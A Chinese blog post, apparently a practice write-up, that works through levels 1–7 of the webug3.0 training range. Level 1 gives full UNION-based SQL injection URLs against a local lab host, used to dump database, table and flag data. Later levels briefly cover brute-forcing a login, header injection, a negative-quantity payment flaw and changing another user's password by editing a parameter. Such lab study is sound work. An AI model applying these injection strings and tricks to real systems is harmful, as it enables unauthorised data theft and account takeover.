• webug3.0靶场渗透基础Day_1


    第一关:

    最简单的get注入

     

    单引号报错

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' order by 5 --+     报错

    说明查询了四列,接着

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,4 --+

     

    发现1234都有回显,后面就很简单了

    查询数据库名

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,database(),4 --+

    爆出数据库名为pentesterlab

    查表

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,table_name,4 from information_schema.tables where table_schema = 'pentesterlab'--+

     

    发现flag表

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,column_name,4 from information_schema.columns where table_name = 'flag'--+

    接着查询数据

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,flag,4 from flag--+

    md5解密后为

     

    第二关:

    打开是一个小狗图片,扩展名改成zip里面有个123.txt

    第三关:

    渗透网站的时候目录也很重要

    扫描目录发现有个test的文件夹

    把test加密得到flag

    第四关:

    当遇到五位验证码的时候可以爆破

    进来是一个登录框,没看到验证码

    经过字典爆破账号密码为admin admin123

    然后就做不来了

    第五关:

    头部的一个注入

    XFF头注入,不做多解释了,后面都一样

    第六关:

    支付问题:用最少的钱去购买到一本书!

    点开是个登陆界面,试了半天发现,密码在第七关的标题

     进来以后

    前面数量为-2本,后面买1本

    不花钱直接白嫖

    ps:没有flag这种东西我好难受

    第七关:

    越权

    登陆上我们的tom用户,发现有个更改密码的超链接

    点开试试

    发现直接传递了name这个参数

    把他改成admin试试

     

    旧密码随便输入,再修改你的新密码,直接就可以修改成功。

    后面的题目等有时间再写,溜了。

  • 相关阅读:
    市场规模的估算
    C#中的线程(一)入门 转载
    2.设计模式-Abstract Factory 抽象工厂模式
    1.设计模式
    Microsoft.Jet.OLEDB.4.0读取EXCEL数据
    转载--加盐密码哈希:如何正确使用
    ragel学习资源整合
    开源库xlslib跨平台编译
    WPF开源框架以及经典博客
    (转载)值得推荐的C/C++框架和库 (真的很强大)
  • 原文地址:https://www.cnblogs.com/qxxaq/p/11633769.html
Copyright © 2020-2023  润新知